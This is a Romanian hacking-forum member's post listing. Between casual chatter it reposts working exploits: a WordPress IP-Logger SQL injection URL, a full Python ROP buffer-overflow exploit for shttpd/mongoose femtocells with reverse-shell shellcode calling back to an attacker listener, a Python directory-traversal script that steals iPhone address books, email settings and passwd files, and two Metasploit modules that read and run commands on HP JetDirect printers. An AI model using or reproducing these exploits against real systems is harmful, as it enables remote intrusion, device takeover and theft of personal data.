-
Posts
2060 -
Joined
-
Last visited
-
Days Won
11
Everything posted by LLegoLLaS
-
@pepe da .
-
sau face ce a facut si Gates...nma' ca ala s-a intors ca era ''pe picioare''(sanatos)
-
da-mi un cod ceva ce vrei sa pun si incerc si eu sau
-
Nu se pune problema de calitate la htc:)Si da, toate is facute in taiwan
-
''cu sufletu' la gura'' ? no shit )ma plictisesc cliseele expirate ale astora...
- 25 replies
-
- 2012
- apocalipsa
-
(and 1 more)
Tagged with:
-
pm me ***chars***
-
done...ai 41 de voturi lol
-
ahahah era pus acolo. ps: daca nu vrei sa astepti 30 sec sa vezi alea apasa continuu pe butonu play/pause si merge counteru (30=5sec)
-
Eu am acelasi laptop (windwos 7 home premium pentru filme si net, nimic deosebit) isi face treaba ok dupa 2 ani(acum 4-5 luni i-am schimbat pasta termoconductoare si am scos un kil de praf din el) totusi mai bine ia-ti ceva din magazin
-
WordPress IP-Logger Plugin <= 3.0 SQL Injection Vulnerability
LLegoLLaS posted a topic in Exploituri
# Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability # Date: 2011-08-16 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip # Version: 3.0 (tested) PoC: http://www.site.com/wp-content/plugins/ip-logger/map-details.php?lat=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=-1&blocked=-1 Vulnerable code: $sql = sprintf("select stamp,ip_v4,url,user_agent,Provider,Code3,Country,Blocked,Ignored from $table_name where Latitude=%s and Longitude=%s and Blocked = '%s' order by stamp asc limit 50", $_REQUEST["lat"], $_REQUEST["lon"], $_REQUEST["blocked"]); $res = mysql_query($sql); Sursa -
#!/usr/bin/env python # part of femtocell research by TU-Berlin # only for educational purposes # Exploit Title: remote root on sfr/ubiquisys femtocell webserver (wsal/shttpd/mongoose) # Date: 2011-08-02 # Author: nion # Software: http://code.google.com/p/mongoose/ http://sourceforge.net/projects/shttpd/ # Version: shttpd <= 1.42, mongoose <= 3.0 # CVE: CVE-2011-2900 # Tested on: Linux (proprietary embedded distro) Linux 2.6.18-ubi-sys-V2.0.17 import socket, sys, time import urllib, struct if(len(sys.argv) < 3): print sys.argv[0] + " <target ip> <listening ip>" sys.exit(-1) target = sys.argv[1] listener = sys.argv[2] SHELLCODE = 0xbc568 # shellcode backup in connect struct, heap is not randomized STACK_LIFT = "%a0%ce%31%40" # didnt want to use urllib to encode at this point # because it moves the heap address depending on if character is printable or not # and i was too lazy to adjust the payload when cleaning up the exploit buf = "PUT /" buf += "A" * 107 # first fill bytes will not be 148 because stack layout looks different when leaving put_dir() buf += STACK_LIFT # repeated stack lifting for i in xrange(0, 26): buf += "A" * 148 buf += STACK_LIFT buf += "B"*132 # padding to overwrite pc, last jump will go over this one buf += STACK_LIFT # this will hit pc and produce our first jump # add sp, sp, #132; pop {r4, r5, r6, r7, pc} buf += "A"*12 # this will be our last stack lifting after buf += STACK_LIFT # jumping through our buffer back up # lets finish the path chunk and make some padding for the # last stack lift before pc gets popped to a different place buf+="AAAAAAAAA/"+"A"*138 # first jump buf += urllib.quote(struct.pack("<L", 0x4032a410)) # --, # v # prepare lr so we can properly return from __clear_cache # 0x4032a410 <makecontext+28>: pop {lr} ; (ldr lr, [sp], #4) # 0x4032a414 <makecontext+32>: add sp, sp, #8 ; 0x8 # 0x4032a418 <makecontext+36>: bx lr buf+=urllib.quote(struct.pack("<L", 0x403e937c)) # free_slotinfo+128, return from __clear_cache buf+="DDDDDDDD" # skip sp lifting, 8 dummy bytes because sp is lifted before branching # --, bx lr # v # 0x403e937c <free_slotinfo+128>: pop {r4, pc} buf+="CCCC" # dummy r4 buf+=urllib.quote(struct.pack("<L", 0x402e5064)) # __aeabi_cfcmple+16 # --, # v # 0x402e5064 <__aeabi_cfcmple+16>: pop {r0, r1, r2, r3, pc} buf+="AAAA" # dummy r0 buf+="CCCC" # dummy r1 (needed for __clear_cache) buf+="DDDD"*2 # dummy r2, r3 buf+=urllib.quote(struct.pack("<L", 0x40364bbc)) # envz_merge+184 # --, # v # 0x40364bbc <envz_merge+184>: mov r0, r11 # 0x40364bc0 <envz_merge+188>: pop {r4, r5, r6, r7, r8, r9, r11, pc} # at this point r11 points to an address on the heap in front of # our shellcode, e.g. 0xad220 buf+="FFFF"*7 # dummy r4-r9+r11 buf+=urllib.quote(struct.pack("<L", 0x402e5484)) # __clear_cache # --, # v # __clear_cache will return to our prepare lr (free_slotinfo+128) # 0x403e937c <free_slotinfo+128>: pop {r4, pc} buf+="AAAA" # dummy r4 buf +=urllib.quote(struct.pack("<L", SHELLCODE)) # jump to shellcode # shellcode + some testing garbage in front of it buf += "A"*16 # some garbage padding in front of our payload, could be nops or whatever # make listener shellcode friendly evil_haxxor = urllib.quote("".join([struct.pack("B", int(x)) for x in listener.split('.')])) # connect back shellcode buf += "%01%10%8F%E2%11%FF%2F%E1%02%20%01%21%92%1A%0F%02%19%37%01%DF%06%1C%08%A1%10%22%02%37%01%DF%3F%27%02%21%30%1c%01%df%01%39%FB%D5%05%A0%92%1A%05%b4%69%46%0b%27%01%DF%C0%46%02%00%11%5c" + evil_haxxor + "%2f%62%69%6e%2f%73%68%00/ HTTP/1.0\r\n" s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((target, 80)) s.send(buf) s.send("\r\n") print s.recv(1024) sursa: Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability - [CVE: 2011-2900] - BugSearch.net
-
vouch e ok omu
-
materiale foarte usoare si rezistente...aceeasi tehnologie folosita in aeronavele de marime reala...chiar daca 9 kg pare mult, nu e
-
ahahaha =))la tobogane strikes again ps: PePe failed
-
nush ce titlu sa pun
LLegoLLaS replied to shaohacker's topic in Sisteme de operare si discutii hardware
E bun asa...PC-ul e bun ca berea si soacra:rece! -
Python Code: #!/usr/bin/python #---------------------------------------------------------------- #Software : iPhone/iPad Phone Drive 1.1.1 #Type of vulnerability : Directory Traversal #Tested On : iPhone 4 (IOS 4.3.3/Jailbroken) #---------------------------------------------------------------- #Program Developer : http://ax.itunes.apple.com/app/id431033044?mt=8 #---------------------------------------------------------------- #Discovered by : Khashayar Fereidani #Team Website : Http://IRCRASH.COM #English Forums : Http://IRCRASH.COM/forums/ #Team Members : Khashayar Fereidani , Arash Allebrahim #Email : irancrash [ a t ] gmail [ d o t ] com #Facebook : http://facebook.com/fereidani #Twitter : http://twitter.com/ircrash #---------------------------------------------------------------- import urllib2 def urlread(url,file): url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file u = urllib2.urlopen(url) localFile = open('result.html', 'w') localFile.write(u.read()) localFile.close() print "file saved as result.html\nIRCRASH.COM 2011" print "----------------------------------------\n- iPhone/iPad Phone Drive 1.1.1 DT -\n- Discovered by : Khashayar Fereidani -\n- http://ircrash.com/ -\n----------------------------------------" url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):") f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"] print f[1] id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:")) if not('http:' in url): url='http://'+url if ((id>0) and (id<6)): file=f[id] urlread(url,file) if (id==6): file=raw_input("Enter Local File Address : ") urlread(url,file) sursa:iPhone/iPad Phone Drive 1.1.1 Directory Traversal - BugSearch.net
-
hop si eu cu trotineta
-
60 ron banda...despre montaj nu stiu ce sa zic dar nu trebuie sa fie mare lucru daca esti atent
-
Tu gandesti? Join Us August 4th — 7th, 2011 All 4 days just $150 USD! at the Rio Hotel in Las Vegas Adica pe-aici...
-
Propun sa NU se renunte la manastirea "Asistenti iT".Foarte buna ideea ZeroCold ai un rep eu zic ca ar fi sufisient doua categorii de coderi: Web si "offline" programming...desi se cam intercaleaza,altfel ar fi 100 de grupuri cu cate 2-3 membrii
-
http://i.imgur.com/3KC9g.jpg a mai fost postat
-
# Exploit Title: HP JetDirect PJL Interface Universal Path Traversal # Date: Aug 7, 2011 # Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/> # Software Link: HP - United States | Laptop Computers, Desktops, Printers, Servers and more # Version: All # Tested on: HP LaserJet Pxxxx Series file:[/c] ## # $Id: $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # Sample Output: # # # msf auxiliary(hp_printer_pjl_traversal) > show options # # Module options (auxiliary/admin/hp_printer_pjl_traversal): # # Name Current Setting Required Description # ---- --------------- -------- ----------- # INTERACTIVE false no Enter interactive mode [msfconsole Only] # RHOST 202.138.16.21 yes The target address # RPATH / yes The remote filesystem path to browse or read # RPORT 9100 yes The target port # # # msf auxiliary(hp_printer_pjl_traversal) > run # # [*] cd / ... # [+] Server returned the following response: # # . TYPE=DIR # .. TYPE=DIR # bin TYPE=DIR # usr TYPE=DIR # etc TYPE=DIR # hpmnt TYPE=DIR # hp TYPE=DIR # lib TYPE=DIR # dev TYPE=DIR # init TYPE=FILE SIZE=9016 # .profile TYPE=FILE SIZE=834 # tmp TYPE=DIR # # # msf auxiliary(hp_printer_pjl_traversal) > set INTERACTIVE true # INTERACTIVE => true # msf auxiliary(hp_printer_pjl_traversal) > set RPATH /hp # RPATH => /hp # msf auxiliary(hp_printer_pjl_traversal) > run # # [*] Entering interactive mode ... # [*] cd /hp ... # [+] Server returned the following response: # # . TYPE=DIR # .. TYPE=DIR # app TYPE=DIR # lib TYPE=DIR # bin TYPE=DIR # webServer TYPE=DIR # images TYPE=DIR # DemoPage TYPE=DIR # loc TYPE=DIR # AsianFonts TYPE=DIR # data TYPE=DIR # etc TYPE=DIR # lrt TYPE=DIR # # [*] Current RPATH: /hp # [*] -> 'quit' to exit # [*] ->'/' to return to file system root # [*] ->'..' to move up to one directory # [*] ->'!r FILE' to read FILE on current directory # # [*] Enter RPATH: # $ > webServer/config # [*] cd /hp/webServer/config ... # [+] Server returned the following response: # # . TYPE=DIR # .. TYPE=DIR # soe.xml TYPE=FILE SIZE=23615 # version.6 TYPE=FILE SIZE=45 # # # [*] Current RPATH: /hp/webServer/config # [*] -> 'quit' to exit # [*] ->'/' to return to file system root # [*] ->'..' to move up to one directory # [*] ->'!r FILE' to read FILE on current directory # # [*] Enter RPATH: # $ > !r version.6 # [*] cat /hp/webServer/config/version.6 ... # [+] Server returned the following response: # # WebServer directory version. Do not delete! # # # [*] Current RPATH: /hp/webServer/config # [*] -> 'quit' to exit # [*] ->'/' to return to file system root # [*] ->'..' to move up to one directory # [*] ->'!r FILE' to read FILE on current directory # # [*] Enter RPATH: # $ > quit # [*] Exited ... Have fun with your Printer! # [*] Auxiliary module execution completed require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info={}) super(update_info(info, 'Name' => 'HP JetDirect PJL Interface Universal Path Traversal', 'Version' => '$Revision: 1 $', 'Description' => %q{ This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100. With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified. }, 'Author' => [ 'Moritz Jodeit <http://www.nruns.com/>', # Bug Discoverer 'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2010-4107' ], [ 'URL', 'http://www.nruns.com/_downloads/SA-2010%20003-Hewlett-Packard.pdf' ], [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02004333' ], [ 'URL', 'http://www.irongeek.com/i.php?page=security/networkprinterhacking' ], [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-laserjet-printer.rb' ], [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-OfficeJet-Printer.rb' ], [ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ] ], 'DisclosureDate' => '2010-11-15')) register_options( [ OptString.new('RPATH', [ true, "The remote filesystem path to browse or read", "/" ] ), OptBool.new('INTERACTIVE', [ false, "Enter interactive mode [msfconsole Only]", false ] ), Opt::RPORT(9100) ],self.class) end def run mode = datastore['INTERACTIVE'] if mode == true set_interactive(datastore['RPATH']) else set_onetime(datastore['RPATH']) end end def set_interactive(spath) action = 'DIR' rpath = spath rfpath = '' tmp_path = '' tmp_file = '' cur_dir = '/' print_status("Entering interactive mode") stop = false set_onetime(rpath) until stop == true print_status("Current RPATH: #{rpath}") print_status("-> 'quit' to exit") print_status("->'/' to return to file system root") print_status("->'..' to move up to one directory") print_status("->'!r FILE' to read FILE on current directory\r\n") print_status("Enter RPATH:") print("$ > ") tmp_path = gets.chomp.to_s if tmp_path =~ /\.\./ && rpath.length > 2 old_path = rpath new_path = rpath[0,rpath.rindex('/')] if new_path != nil rpath = new_path else rpath = '/' end rpath = '/' if rpath.length == 0 print_status("Change to one up directory: #{rpath}") elsif tmp_path =~ /\!r\s/ cur_dir = rpath tmp_file = tmp_path.gsub('!r ','') rfpath = cur_dir + '/' + tmp_file rfpath = rfpath.gsub('//','/') action = 'FILE' elsif tmp_path == '/' rpath = '/' elsif rpath != '/' rpath = rpath + '/' << tmp_path else rpath = rpath << tmp_path end if rpath =~ /quit/ stop= true rpath = '/' print_status("Exited ... Have fun with your Printer!") else rpath = rpath.gsub('//','/') if action == 'FILE' set_onetime(rfpath,action) cur_dir = rpath else set_onetime(rpath,action) end action = 'DIR' end end end def set_onetime(spath,saction = datastore['ACTION']) rpathx = spath action = saction rpathx = '/' if rpathx =~ /\/quit/ connect dir_cmd = "\x1b%-12345X@PJL FSDIRLIST NAME=\"0:/../../../[REPLACE]\" ENTRY=1 COUNT=99999999\x0d\x0a\x1b%-12345X\x0d\x0a" file_cmd = "\x1b%-12345X@PJL FSUPLOAD NAME=\"0:/../../../[REPLACE]\" OFFSET=0 SIZE=99999999\x0d\x0a\x1b%-12345X\x0d\x0a" if action =~ /DIR/ r_cmd = dir_cmd.sub("[REPLACE]",rpathx) print_status("cd #{rpathx} ...") else r_cmd = file_cmd.sub("[REPLACE]",rpathx) print_status("cat #{rpathx} ...") end recv = sock.put(r_cmd) res = sock.get(-1,1) if (!res) print_error("ERROR in receiving data!\r\n") else if res.to_s =~ /ERROR/ print_error("Operation Not Permitted or File/DIR Not Found!\r\n") disconnect return end resx = res.to_s[res.index("\r\n")+1,res.length] print_good("Server returned the following response:\r\n#{resx}") end disconnect end end
-
# Exploit Title: HP JetDirect PJL Query Execution # Date: Aug 7, 2011 # Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/> # Software Link: HP - United States | Laptop Computers, Desktops, Printers, Servers and more # Version: All # Tested on: HP LaserJet Pxxxx Series file: ## # $Id: $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # Sample Output: # # # msf auxiliary(hp_printer_pjl_cmd) > show options # # Module options (auxiliary/admin/hp_printer_pjl_cmd): # # Name Current Setting Required Description # ---- --------------- -------- ----------- # CMD FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=999 yes PJL Command to run # INTERACTIVE true no Enter interactive mode [msfconsole Only] # RHOST 202.138.16.21 yes The target address # RPORT 9100 yes The target port # # msf auxiliary(hp_printer_pjl_cmd) > run # # [*] Entering interactive mode ... # [*] Please wait while executing - # [*] FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=999 # [+] Server returned the following response: # # root::0:0::/:/bin/dlsh # # # [*] Enter PJL Command: # [*] -> 'quit' to exit # $ > fsdirlist name="0:/../../../" entry=1 count=99999999 # [*] Please wait while executing - # [*] fsdirlist name="0:/../../../" entry=1 count=99999999 # [+] Server returned the following response: # # . TYPE=DIR # .. TYPE=DIR # bin TYPE=DIR # usr TYPE=DIR # etc TYPE=DIR # hpmnt TYPE=DIR # hp TYPE=DIR # lib TYPE=DIR # dev TYPE=DIR # init TYPE=FILE SIZE=9016 # .profile TYPE=FILE SIZE=834 # tmp TYPE=DIR # # # [*] Enter PJL Command: # [*] -> 'quit' to exit # $ > quit # [*] Exited ... Have fun with your Printer! # [*] Auxiliary module execution completed # msf auxiliary(hp_printer_pjl_cmd) > require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info={}) super(update_info(info, 'Name' => 'HP JetDirect Printer PJL Query Execution', 'Version' => '$Revision: 1 $', 'Description' => %q{ This module act as a HP printer PJL (Printer Job Language) query tool that allows you to submit your own PJL commands. Valid PJL commands are required to get successful response. See the reference section for PJL reference guides from HP. }, 'Author' => [ 'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13208/bpl13208.pdf' ], [ 'URL', 'http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13207/bpl13207.pdf' ], [ 'URL', 'https://secure.wikimedia.org/wikipedia/en/wiki/Printer_Job_Language' ], [ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ] ], 'DisclosureDate' => ' 2011')) register_options( [ OptString.new('CMD', [ true, "PJL Command to run", 'FSUPLOAD NAME="0:/../../../.profile" OFFSET=0 SIZE=999' ] ), OptBool.new('INTERACTIVE', [ false, "Enter interactive mode [msfconsole Only]", false ] ), Opt::RPORT(9100) ],self.class) end def run mode = datastore['INTERACTIVE'] if mode == true set_interactive(datastore['CMD']) else set_onetime(datastore['CMD']) end end def set_interactive(scmd) cmd = scmd print_status("Entering interactive mode ...") stop = false set_onetime(cmd) until stop == true print_status("Enter PJL Command:") print_status("-> 'quit' to exit") print("$ > ") tmp_cmd = '' tmp_cmd = gets.chomp.to_s if tmp_cmd =~ /quit/ stop= true print_status("Exited ... Have fun with your Printer!") else set_onetime(tmp_cmd) end end end def set_onetime(scmd) connect cmd = "\x1b%-12345X@PJL [REPLACE]\x0d\x0a\x1b%-12345X\x0d\x0a" r_cmd = cmd.sub("[REPLACE]",scmd) print_status("Please wait while executing -") print_status("#{scmd}") recv = sock.put(r_cmd) res = sock.get(-1,1) if (!res) print_error("ERROR in receiving data!\r\n") else if res.to_s =~ /ERROR/ print_error("BAD COMMAND OR ERROR\r\n") disconnect return end resx = res.to_s[res.index("\r\n")+1,res.length] print_good("Server returned the following response:\r\n#{resx}") end disconnect end end
-
dai cu DoS ca ma indoiesc ca ai tu acces la mai multe pcuri...si las-o balta nu rezolvi cu (D)DoS mai bine cauta vulnerabilitati